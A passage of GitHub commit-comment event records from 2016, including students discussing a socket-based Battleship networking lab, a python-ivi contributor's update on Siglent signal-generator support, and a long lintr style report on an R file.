but\n>>> > it\n>>> > >> should be the address of localhost, which is the same no matter what\n>>> > >> machine it is running on) just to run it on your local machine to\n>>> test,\n>>> > it\n>>> > >> will be changed to the ip address of the machine it is running on\n>>> when\n>>> > they\n>>> > >> grade it.\n>>> > >>\n>>> > >> On Sat, Sep 17, 2016 at 6:26 PM, David Schwehr <dpschwehr@gmail.com\n>>> >\n>>> > >> wrote:\n>>> > >>\n>>> > >>> It is getting the fire commands from the command line arguments,\n>>> that\n>>> > is\n>>> > >>> why the client is being invoked every play. The connection is made\n>>> > with the\n>>> > >>> port number and IP address passed in from the command line\n>>> arguments. I\n>>> > >>> have already wrote the code for the connection using the socket\n>>> > library.\n>>> > >>> Thev ariables for the x and y coords passed from the command line\n>>> are\n>>> > >>> working just as you had them in your test.py, I added it to the\n>>> > client.py\n>>> > >>> file already. These variable will be used in the methods that send\n>>> the\n>>> > http\n>>> > >>> message. The http and passing in the variable I think will be the\n>>> easy\n>>> > >>> part, some of it is done and it works. The time consuming part is\n>>> > going to\n>>> > >>> be writing the code to maintain the board and \"serving\" the\n>>> display of\n>>> > the\n>>> > >>> board.\n>>> > >>> Tracking sunk ships will work as you suggested and this will be\n>>> put in\n>>> > a\n>>> > >>> method called from read_board or process_reply or done inside of\n>>> > >>> process_reply.\n>>> > >>>\n>>> > >>> On Sat, Sep 17, 2016 at 6:10 PM, tyler-sassaman <\n>>> > >>> notifications@github.com> wrote:\n>>> > >>>\n>>> > >>>> I was thinking about tracking sunk ships. Just a thought, but\n>>> what if\n>>> > >>>> we had a global variable for each ship (carrier = 5), and every\n>>> time\n>>> > we hit\n>>> > >>>> that type of ship we decrement that value, and compare it to 0.\n>>> so if\n>>> > >>>> carrier gets to 0 then it has been hit 5 times which is the same\n>>> > thing as\n>>> > >>>> being sunk.\n>>> > >>>>\n>>> > >>>> —\n>>> > >>>> You are receiving this because you authored the thread.\n>>> > >>>> Reply to this email directly, view it on GitHub\n>>> > >>>> <https://github.com/dssquared/Networks_Lab1/commit/\n>>> > 7f5b3dc1ba8a89d303ffa5a927903a77492af920#commitcomment-19068085>,\n>>> > >>>> or mute the thread\n>>> > >>>> <https://github.com/notifications/unsubscribe-auth/AE8DG_y6g\n>>> kDXIV5_\n>>> > YwVT263okb39zDjcks5qrIFygaJpZM4J_dYG>\n>>> > >>>> .\n>>> > >>>>\n>>> > >>>\n>>> > >>>\n>>> > >>\n>>> > >\n>>> >\n>>> > —\n>>> > You are receiving this because you commented.\n>>> > Reply to this email directly, view it on GitHub\n>>> > <https://github.com/dssquared/Networks_Lab1/commit/7f5b3dc1b\n>>> a8a89d303ffa5a927903a77492af920#commitcomment-19071806>,\n>>> > or mute the thread\n>>> > <https://github.com/notifications/unsubscribe-auth/ANiCOS9eO\n>>> _caF6oZivfhC4W6aceQXCnFks5qrYi_gaJpZM4J_dYG>\n>>>\n>>> > .\n>>> >\n>>>\n>>> —\n>>> You are receiving this because you authored the thread.\n>>> Reply to this email directly, view it on GitHub\n>>> <https://github.com/dssquared/Networks_Lab1/commit/7f5b3dc1ba8a89d303ffa5a927903a77492af920#commitcomment-19071958>,\n>>> or mute the thread\n>>> <https://github.com/notifications/unsubscribe-auth/AE8DG5F6ycythOV16iTCINZqZXSNnY3Fks5qrZAFgaJpZM4J_dYG>\n>>> .\n>>>\n>>\n>>\n>\n"}},"created_at":"2016-09-18T20:26:30Z"}
{"id":"4580568619","type":"CommitCommentEvent","actor":{"login":"robertmaisano"},"repo":{"name":"robertmaisano/hello-world"},"payload":{"comment":{"id":19072142,"position":null,"line":null,"path":null,"commit_id":"8a4ea80de99628bf835dbb100ff96e2548334303","created_at":"2016-09-18T20:27:13Z","updated_at":"2016-09-18T20:27:13Z","body":"# hello-world\r\n\r\nHi there,\r\n\r\nWriting a few testing scripts.\r\n"}},"created_at":"2016-09-18T20:27:13Z"}
{"id":"4580569581","type":"CommitCommentEvent","actor":{"login":"yanphile"},"repo":{"name":"yanphile/lingzhi"},"payload":{"comment":{"id":19072143,"position":null,"line":null,"path":null,"commit_id":"86b57bafa7d56dac42a236392110e69412fcb93f","created_at":"2016-09-18T20:27:51Z","updated_at":"2016-09-18T20:27:51Z","body":"delette pic1/2"}},"created_at":"2016-09-18T20:27:51Z"}
{"id":"4580570907","type":"CommitCommentEvent","actor":{"login":"EvilMav"},"repo":{"name":"EvilMav/python-ivi"},"payload":{"comment":{"id":19072146,"position":null,"line":null,"path":null,"commit_id":"5c5bcd3cc889e975fcde7fc862d3d4a2c8f81c8d","created_at":"2016-09-18T20:28:44Z","updated_at":"2016-09-18T20:28:44Z","body":"Hey @ianrrees ,\r\n\r\nsorry it took me almost forever implementing it - had a lot less time to spare then expected lately - the newest commit seems to be usable now, a hand in testing would be welcome if you like. I'm yet to implement the frequency counter and modulation support. \r\n\r\nNot quite sure if I should even use the IVI counter class, as it defines lot's of options of which the siglent would only support 3 or 4 - the help() would be polluted with a lot of unsupported stuff.\r\n\r\nKnown problems include the unability to remove/clear the arbitrary waveform memory (I couldn't find a command capable of doing it!) and that the burst mode settings being always overriden rather then read (the BTWV? command gave me some headache during testing so I discarded it for now... BTWV trigger settings are also discarded by siglent if not issued one at a time) \r\n\r\nI've also added an arb_mode switch to choose between DDS and TrueArb, but going into burst mode will switch back to DDS as TrueArb is not supported, while setting sampling_rate instead of frequency will switch into TrueArb from DDS, as the SRATE command is not supported otherwise...\r\n\r\nLet me know what you think - I'm new to python, so critique is welcome =)"}},"created_at":"2016-09-18T20:28:44Z"}
{"id":"4580571094","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"thijsjanzen/STEPCAM"},"payload":{"comment":{"id":19072147,"position":null,"line":null,"path":null,"commit_id":"19ba77b6ed9a71781603432d416fc241118b4ff7","created_at":"2016-09-18T20:28:48Z","updated_at":"2016-09-18T20:28:48Z","body":"[R/ABC_SMC.R:2:1:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L2) *style:* **Variable and function names should be all lowercase.**\n```r\n​getRandomVals <- function(max_val)  {\n^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:15:1:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L15) *style:* **Variable and function names should be all lowercase.**\n```r\n​getFromPrevious <- function(inds, ws, disps, filts, comps)  {\n^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:22:1:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L22) *style:* **Variable and function names should be all lowercase.**\n```r\n​calculateWeight <- function(params, target, sigma,\n^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:29:5:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L29) *style:* **Variable and function names should be all lowercase.**\n```r\n​    prevP <- c(disp_vals[i], filt_vals[i], comp_vals[i])\n    ^~~~~\n```\n[R/ABC_SMC.R:30:30:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L30) *style:* **Variable and function names should be all lowercase.**\n```r\n​    diff <- params[target] - prevP[target]\n                             ^~~~~\n```\n[R/ABC_SMC.R:37:1:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L37) *style:* **Variable and function names should be all lowercase.**\n```r\n​normalizeWeights <- function(x) {\n^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:71:1:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L71) *style:* **Variable and function names should be all lowercase.**\n```r\n​calculateDistance <- function(rich, even, div, opt_diff, obs, sd_vals)  {\n^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:75:40:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L75) *style:* **Put spaces around all infix operators.**\n```r\n​  fit_optima <- (opt_diff / sd_vals[4])^2;\n                                      ~^~\n```\n[R/ABC_SMC.R:83:21:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L83) *style:* **Variable and function names should be all lowercase.**\n```r\n​ABC_SMC <- function(numParticles, species_fallout, taxa, esppres, n_traits,\n                    ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:85:1:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L85) *style:* **lines should not be more than 80 characters.**\n```r\n​                    abundances, frequencies, stopRate, Ord, continue_from_file = TRUE,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:85:46:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L85) *style:* **Variable and function names should be all lowercase.**\n```r\n​                    abundances, frequencies, stopRate, Ord, continue_from_file = TRUE,\n                                             ^~~~~~~~\n```\n[R/ABC_SMC.R:90:3:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L90) *style:* **Variable and function names should be all lowercase.**\n```r\n​  dispVals <- 1:numParticles\n  ^~~~~~~~\n```\n[R/ABC_SMC.R:90:17:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L90) *style:* **Variable and function names should be all lowercase.**\n```r\n​  dispVals <- 1:numParticles\n                ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:91:3:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L91) *style:* **Variable and function names should be all lowercase.**\n```r\n​  filtVals <- 1:numParticles\n  ^~~~~~~~\n```\n[R/ABC_SMC.R:91:17:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L91) *style:* **Variable and function names should be all lowercase.**\n```r\n​  filtVals <- 1:numParticles\n                ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:92:3:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L92) *style:* **Variable and function names should be all lowercase.**\n```r\n​  compVals <- 1:numParticles\n  ^~~~~~~~\n```\n[R/ABC_SMC.R:92:17:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L92) *style:* **Variable and function names should be all lowercase.**\n```r\n​  compVals <- 1:numParticles\n                ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:94:13:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L94) *style:* **Variable and function names should be all lowercase.**\n```r\n​  fits <- 1:numParticles\n            ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:95:3:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L95) *style:* **Variable and function names should be all lowercase.**\n```r\n​  RichVec <- 1:numParticles\n  ^~~~~~~\n```\n[R/ABC_SMC.R:95:16:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L95) *style:* **Variable and function names should be all lowercase.**\n```r\n​  RichVec <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:96:3:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L96) *style:* **Variable and function names should be all lowercase.**\n```r\n​  EveVec <- 1:numParticles\n  ^~~~~~\n```\n[R/ABC_SMC.R:96:15:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L96) *style:* **Variable and function names should be all lowercase.**\n```r\n​  EveVec <- 1:numParticles\n              ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:97:3:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L97) *style:* **Variable and function names should be all lowercase.**\n```r\n​  DivVec <- 1:numParticles\n  ^~~~~~\n```\n[R/ABC_SMC.R:97:15:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L97) *style:* **Variable and function names should be all lowercase.**\n```r\n​  DivVec <- 1:numParticles\n              ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:98:3:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L98) *style:* **Variable and function names should be all lowercase.**\n```r\n​  OptVec <- 1:numParticles\n  ^~~~~~\n```\n[R/ABC_SMC.R:98:15:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L98) *style:* **Variable and function names should be all lowercase.**\n```r\n​  OptVec <- 1:numParticles\n              ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:100:3:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L100) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextDisp <- dispVals\n  ^~~~~~~~\n```\n[R/ABC_SMC.R:100:15:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L100) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextDisp <- dispVals\n              ^~~~~~~~\n```\n[R/ABC_SMC.R:101:3:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L101) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextFilt <- filtVals\n  ^~~~~~~~\n```\n[R/ABC_SMC.R:101:15:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L101) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextFilt <- filtVals\n              ^~~~~~~~\n```\n[R/ABC_SMC.R:102:3:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L102) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextComp <- compVals\n  ^~~~~~~~\n```\n[R/ABC_SMC.R:102:15:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L102) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextComp <- compVals\n              ^~~~~~~~\n```\n[R/ABC_SMC.R:104:21:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L104) *style:* **Variable and function names should be all lowercase.**\n```r\n​  weights <- rep(1, numParticles)\n                    ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:105:3:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L105) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextWeights <- rep(1, numParticles)\n  ^~~~~~~~~~~\n```\n[R/ABC_SMC.R:105:25:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L105) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextWeights <- rep(1, numParticles)\n                        ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:106:16:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L106) *style:* **Variable and function names should be all lowercase.**\n```r\n​  indices <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:113:1:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L113) *style:* **lines should not be more than 80 characters.**\n```r\n​    cat(\"Found previous output, continuing from that output\\n\"); flush.console();\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:118:5:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L118) *style:* **Variable and function names should be all lowercase.**\n```r\n​    dispVals <- d[, 1]\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:119:5:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L119) *style:* **Variable and function names should be all lowercase.**\n```r\n​    filtVals <- d[, 2]\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:120:5:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L120) *style:* **Variable and function names should be all lowercase.**\n```r\n​    compVals <- d[, 3]\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:125:11:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L125) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if (d[numParticles, 1] == numParticles) {\n          ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:125:31:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L125) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if (d[numParticles, 1] == numParticles) {\n                              ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:143:5:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L143) *style:* **Variable and function names should be all lowercase.**\n```r\n​    numberAccepted <- 0\n    ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:144:28:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L144) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if (t != 1) weights <- normalizeWeights(weights)\n                           ^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:144:28:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L144) *warning:* **no visible global function definition for ‘normalizeWeights’**\n```r\n​    if (t != 1) weights <- normalizeWeights(weights)\n                           ^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:152:12:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L152) *style:* **Variable and function names should be all lowercase.**\n```r\n​    while (numberAccepted < numParticles) {\n           ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:152:29:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L152) *style:* **Variable and function names should be all lowercase.**\n```r\n​    while (numberAccepted < numParticles) {\n                            ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:156:19:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L156) *style:* **Variable and function names should be all lowercase.**\n```r\n​        params <- getRandomVals(species_fallout)\n                  ^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:156:19:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L156) *warning:* **no visible global function definition for ‘getRandomVals’**\n```r\n​        params <- getRandomVals(species_fallout)\n                  ^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:158:19:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L158) *style:* **Variable and function names should be all lowercase.**\n```r\n​        params <- getFromPrevious(indices, weights,\n                  ^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:159:35:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L159) *style:* **Variable and function names should be all lowercase.**\n```r\n​                                  dispVals, filtVals, compVals)\n                                  ^~~~~~~~\n```\n[R/ABC_SMC.R:159:45:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L159) *style:* **Variable and function names should be all lowercase.**\n```r\n​                                  dispVals, filtVals, compVals)\n                                            ^~~~~~~~\n```\n[R/ABC_SMC.R:159:55:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L159) *style:* **Variable and function names should be all lowercase.**\n```r\n​                                  dispVals, filtVals, compVals)\n                                                      ^~~~~~~~\n```\n[R/ABC_SMC.R:160:19:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L160) *warning:* **no visible global function definition for ‘perturb’**\n```r\n​        params <- perturb(params, sigma)\n                  ^~~~~~~\n```\n[R/ABC_SMC.R:188:20:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L188) *style:* **Variable and function names should be all lowercase.**\n```r\n​      FD_output <- strippedDbFd(Ord, communities[, present_species])\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:188:20:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L188) *warning:* **no visible global function definition for ‘strippedDbFd’**\n```r\n​      FD_output <- strippedDbFd(Ord, communities[, present_species])\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:189:1:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L189) *style:* **lines should not be more than 80 characters.**\n```r\n​      FRic <- FD_output$FRic # FRic = functional richness (Villeger et al, 2008, Ecology)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:190:1:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L190) *style:* **lines should not be more than 80 characters.**\n```r\n​      FEve <- FD_output$FEve # FEve = functional evenness (Villeger et al, 2008, Ecology)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:191:1:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L191) *style:* **lines should not be more than 80 characters.**\n```r\n​      FDiv <- FD_output$FDiv # FDiv = functional diversity (Villeger et al, 2008, Ecology)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:195:1:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L195) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  } else {\n^\n```\n[R/ABC_SMC.R:196:1:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L196) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    d <- read.table(paste(\"particles_t=\", t, \".txt\", sep=\"\",\n^\n```\n[R/ABC_SMC.R:197:1:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L197) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                          collapse = NULL), header = F)\n^\n```\n[R/ABC_SMC.R:198:1:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L198) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  }\n^\n```\n[R/ABC_SMC.R:200:1:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L200) *style:* **lines should not be more than 80 characters.**\n```r\n​      # calculate distance of trait mean simulated community from that of observed\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:203:1:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L203) *style:* **lines should not be more than 80 characters.**\n```r\n​      # (inverse) fit of model: euclidian distance of FD and trait mean values of\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:205:1:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L205) *style:* **lines should not be more than 80 characters.**\n```r\n​      fit <- calculateDistance(FRic[[1]], FEve[[1]], FDiv[[1]], mean_optimum[1], summary_stats, sd_vals)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:205:14:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L205) *style:* **Variable and function names should be all lowercase.**\n```r\n​      fit <- calculateDistance(FRic[[1]], FEve[[1]], FDiv[[1]], mean_optimum[1], summary_stats, sd_vals)\n             ^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:205:14:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L205) *warning:* **no visible global function definition for ‘calculateDistance’**\n```r\n​      fit <- calculateDistance(FRic[[1]], FEve[[1]], FDiv[[1]], mean_optimum[1], summary_stats, sd_vals)\n             ^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:209:9:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L209) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted <- numberAccepted + 1\n        ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:209:27:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L209) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted <- numberAccepted + 1\n                          ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:210:9:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L210) *style:* **Variable and function names should be all lowercase.**\n```r\n​        nextDisp[numberAccepted] <- params[1]\n        ^~~~~~~~\n```\n[R/ABC_SMC.R:210:18:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L210) *style:* **Variable and function names should be all lowercase.**\n```r\n​        nextDisp[numberAccepted] <- params[1]\n                 ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:211:9:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L211) *style:* **Variable and function names should be all lowercase.**\n```r\n​        nextFilt[numberAccepted] <- params[2]\n        ^~~~~~~~\n```\n[R/ABC_SMC.R:211:18:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L211) *style:* **Variable and function names should be all lowercase.**\n```r\n​        nextFilt[numberAccepted] <- params[2]\n                 ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:212:9:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L212) *style:* **Variable and function names should be all lowercase.**\n```r\n​        nextComp[numberAccepted] <- params[3]\n        ^~~~~~~~\n```\n[R/ABC_SMC.R:212:18:](https://github.com/thijsjanzen/STEPCAM/blob/19ba77b6ed9a71781603432d416fc241118b4ff7/R/ABC_SMC.R#L212) *style:* **Variable and function names should be all lowercase.**\n```r\n​        nextComp[numberAccepted] <- params[3]\n                 